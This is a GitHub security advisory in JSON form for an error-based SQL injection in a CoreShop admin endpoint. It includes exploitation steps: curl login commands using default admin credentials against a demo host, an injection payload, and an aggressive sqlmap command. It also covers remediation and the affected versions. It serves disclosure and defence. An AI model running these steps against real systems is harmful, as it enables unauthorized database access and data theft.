{"id":"GHSA-fqcv-8859-86x2","summary":"CoreShop Vulnerable to SQL Injection via Admin customer-company-modifier","details":"# SQL Injection in CustomerTransformerController\n\n## Summary\nAn **error-based SQL Injection vulnerability** was identified in the `CustomerTransformerController` within the CoreShop admin panel.  \nThe affected endpoint improperly interpolates user-supplied input into a SQL query, leading to database error disclosure and potential data extraction.\n\nThis issue is classified as **MEDIUM severity**, as it allows SQL execution in an authenticated admin context.\n\n---\n\n## Details\nThe vulnerability exists in the company name duplication check endpoint:\n\n```\n/admin/coreshop/customer-company-modifier/duplication-name-check?value=\n```\n\nSource code analysis indicates that user input is directly embedded into a SQL condition without parameterization.\n\n**Vulnerable file:**\n```\n/app/repos/coreshop/src/CoreShop/Bundle/CustomerBundle/Controller/CustomerTransformerController.php\n```\n\n**Vulnerable code pattern:**\n```php\nsprintf('name LIKE \"%%%s%%\"', (string) $value)\n```\n\nThe `$value` parameter is fully user-controlled and is not escaped or bound as a prepared statement parameter.  \nSupplying a double quote (`\"`) causes a SQL syntax error, confirming that the input is executed in a SQL context.\n\n---\n\n## Exploitation Steps:\n\n### Prerequisites\n- Admin panel access at `https://demo4.coreshop.org/admin`\n- Default credentials: `admin / coreshop`\n\n### Authenticate to admin panel\n```bash\n   # Get CSRF token\n   curl -s 'https://demo4.coreshop.org/admin/login/csrf-token' | grep csrfToken\n\n   # Initialize session\n   curl -s -c /tmp/session.txt 'https://demo4.coreshop.org/admin/login' \u003e /dev/null\n\n   # Get CSRF token with session\n   CSRF=$(curl -s -b /tmp/session.txt 'https://demo4.coreshop.org/admin/login/csrf-token' | grep -o '\"csrfToken\":\"[^\"]*\"' | cut -d'\"' -f4)\n\n   # Login\n   curl -s -i -b /tmp/session.txt -c /tmp/session.txt \\\n     -X POST 'https://demo4.coreshop.org/admin/login/login' \\\n     -H 'Content-Type: application/x-www-form-urlencoded' \\\n     -d \"username=admin&password=coreshop&csrfToken=$CSRF\"\n   ```\n\n### Trigger SQL error to confirm injection\n   ```bash\n   curl -s -b /tmp/session.txt \\\n     'https://demo4.coreshop.org/admin/coreshop/customer-company-modifier/duplication-name-check?value=%22'\n   ```\n\n   **Expected result:** HTTP 500 error page with title \"500 | CORS - Pimcore Digital Agency\"\n\n   **Normal response (non-error):**\n   ```json\n   {\"success\":true,\"message\":null,\"list\":[]}\n   ```\n\n### Proof of Impact:\n\n**Test 1 - Normal query:**\n```bash\nGET /admin/coreshop/customer-company-modifier/duplication-name-check?value=test\nResponse: {\"success\":true,\"message\":null,\"list\":[]}\n```\n\n**Test 2 - SQL injection (error-inducing):**\n```bash\nGET /admin/coreshop/customer-company-modifier/duplication-name-check?value=\"\nResponse: HTTP 500 Internal Server Error\n\u003c!DOCTYPE html\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n  \u003ctitle\u003e500 | CORS - Pimcore Digital Agency\u003c/title\u003e\n  ...\n\u003c/head\u003e\n```\nThe double quote character causes a SQL syntax error, confirming the injection point. The application returns a 500 error instead of the normal JSON response, proving that unescaped user input reaches the SQL query.\n\n**Sqlmap Result:**\n```bash\npython sqlmap.py -r sql.txt --random-agent --batch --force-ssl --ignore-code=403,404 --no-cast --tamper=between,randomcase,space2comment --proxy http://127.0.0.1:8080/ --dbms=mysql -p value --level=5 --risk=3 --current-db\n```\n\u003cimg width=\"1921\" height=\"747\" alt=\"sqlmappoc\" src=\"https://github.com/user-attachments/assets/4069bbd4-d1a1-4ad1-9983-24402a20f985\" /\u003e\n\n---\n\n## Impact\n- **Vulnerability type:** SQL Injection (Error-based)\n- **Affected users:** CoreShop / Pimcore admin users\n- **Potential impact:**\n  - Database error disclosure\n  - Database schema enumeration\n  - Possible data extraction via error-based or blind SQL injection\n\n---\n\n## Recommended Fix\n\n### 1. Use Parameterized Queries (Required)\nAvoid building SQL conditions using string concatenation or `sprintf`.  \nUse Doctrine QueryBuilder parameters instead.\n\n**❌ Vulnerable example:**\n```php\n$condition = sprintf('name LIKE \"%%%s%%\"', (string) $value);\n```\n\n**✅ Secure example (Doctrine QueryBuilder):**\n```php\n$qb-\u003eandWhere('c.name LIKE :name')\n   -\u003esetParameter('name', '%' . $value . '%');\n```\n\nThis ensures proper escaping and prevents SQL injection.\n\n---\n\n### 2. Validate User Input (Defense-in-Depth)\nApply strict input validation before processing user data:\n\n```php\nif (!is_string($value) || mb_strlen($value) \u003e 255) {\n    throw new BadRequestHttpException('Invalid input');\n}\n```\n\nOptionally, restrict allowed characters if business logic permits.\n\n---\n\n### 3. Handle Errors Gracefully\nAvoid returning raw 500 error pages to users.  \nCatch database exceptions and return a controlled JSON error response instead:\n\n```php\nreturn new JsonResponse([\n    'success' =\u003e false,\n    'message' =\u003e 'Invalid request'\n], 400);\n```\n\n---\n\n### 4. Security Best Practice\n- Never interpolate user input directly into SQL strings\n- Always use prepared statements or ORM parameter binding\n- Ensure consistent input validation on all admin endpoints\n\n---","aliases":["CVE-2026-23959"],"modified":"2026-02-03T03:10:06.717359Z","published":"2026-01-21T16:13:12Z","database_specific":{"github_reviewed_at":"2026-01-21T16:13:12Z","nvd_published_at":"2026-01-22T03:15:46Z","cwe_ids":["CWE-564"],"severity":"MODERATE","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/coreshop/CoreShop/security/advisories/GHSA-fqcv-8859-86x2"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23959"},{"type":"WEB","url":"https://github.com/coreshop/CoreShop/commit/af80b8f5c7df5f02f44e9c5e0a4a564de274eec2"},{"type":"PACKAGE","url":"https://github.com/coreshop/CoreShop"},{"type":"WEB","url":"https://github.com/coreshop/CoreShop/releases/tag/4.1.9"}],"affected":[{"package":{"name":"coreshop/core-shop","ecosystem":"Packagist","purl":"pkg:composer/coreshop/core-shop"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"4.1.9"}]}],"versions":["1.0.0","1.0.1","1.0.2","1.0.3","1.0.4","1.0.5","1.0.6","1.0RC1","1.0RC2","1.0RC3","1.1.0","1.1.1","1.1.2","1.2.0","1.2.1","1.2.2","1.2.3","2.0.0","2.0.0-RC.1","2.0.0-RC.2","2.0.0-alpha.1","2.0.0-alpha.2","2.0.0-alpha.3","2.0.0-alpha.4","2.0.0-alpha.5","2.0.0-beta.1","2.0.0-beta.2","2.0.0-beta.3","2.0.0-beta.4","2.0.1","2.0.10","2.0.11","2.0.12","2.0.2","2.0.3","2.0.4","2.0.5","2.0.6","2.0.7","2.0.8","2.0.9","2.1.0","2.1.0-RC.1","2.1.0-RC.2","2.1.1","2.1.2","2.1.3","2.1.4","2.1.5","2.1.6","2.1.7","2.1.8","2.1.9","2.2.0","2.2.0-RC.1","2.2.0-RC.2","2.2.1","2.2.10","2.2.11","2.2.12","2.2.13","2.2.14","2.2.2","2.2.3","2.2.4","2.2.5","2.2.6","2.2.7","2.2.8","2.2.9","3.0.0","3.0.0-beta.1","3.0.0-beta.2","3.0.0-beta.3","3.0.0-beta.4","3.0.0-beta.5","3.0.1","3.0.2","3.0.3","3.0.4","3.0.5","3.0.6","3.0.7","3.1.0","3.1.1","3.1.2","3.1.3","3.1.4","3.1.5","3.2.0","3.2.0-beta.1","3.2.0-beta.2","3.2.1","3.2.10","3.2.11","3.2.12","3.2.13","3.2.14","3.2.15","3.2.16","3.2.17","3.2.18","3.2.19","3.2.2","3.2.20","3.2.3","3.2.4","3.2.5","3.2.6","3.2.7","3.2.8","3.2.9","4.0.0","4.0.0-beta.1","4.0.0-beta.2","4.0.0-beta.3","4.0.0-beta.4","4.0.1","4.0.10","4.0.11","4.0.12","4.0.13","4.0.14","4.0.15","4.0.16","4.0.17","4.0.2","4.0.3","4.0.4","4.0.5","4.0.6","4.0.7","4.0.8","4.0.9","4.1.0","4.1.0-RC1","4.1.0-RC2","4.1.1","4.1.2","4.1.3","4.1.4","4.1.5","4.1.6","4.1.7","4.1.8","v0.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-fqcv-8859-86x2/GHSA-fqcv-8859-86x2.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"}]}